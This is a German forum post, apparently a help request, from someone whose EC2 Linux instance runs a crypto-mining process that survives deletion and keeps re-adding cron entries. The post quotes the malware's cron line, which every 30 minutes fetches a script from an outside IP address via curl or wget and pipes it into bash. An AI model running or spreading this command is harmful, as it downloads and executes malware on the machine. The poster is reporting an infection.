In den letzten Tagen ist mir aufgefallen, dass die auf meiner EC2-Linux-Instanz laufenden Anwendungen sehr langsam sind. Beim Ausführen des topBefehls wurde mir angezeigt, dass es einen Prozess gibt, der /var/tmp/sustseden Großteil der CPU nutzt.
Ich habe diesen Prozess abgebrochen. Nach dem Neustart der Instanz lief sie jedoch wieder und nutzte den Großteil der CPU. Außerdem werden Cron-Einträge für das folgende Skript erstellt:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
Ich habe gegoogelt und herausgefunden, dass es sich um eine Krypto-Mining-Malware handelt. Ich habe ihre Spuren entfernt von/var/tmp/und habe die Einträge in Crontab entfernt. Allerdings scheinen diese Einträge in Crontab von irgendwoher zurückzukommen und ich konnte den genauen Speicherort des Skripts, das diese Einträge erstellt, nicht zurückverfolgen.
Ich habe auch /var/spool/cron*-Einträge bereinigt.
Ich habe online nicht viele Informationen zur Behebung dieses Problems gefunden. Für jede Hilfe wäre ich sehr dankbar.
Dank im Voraus!!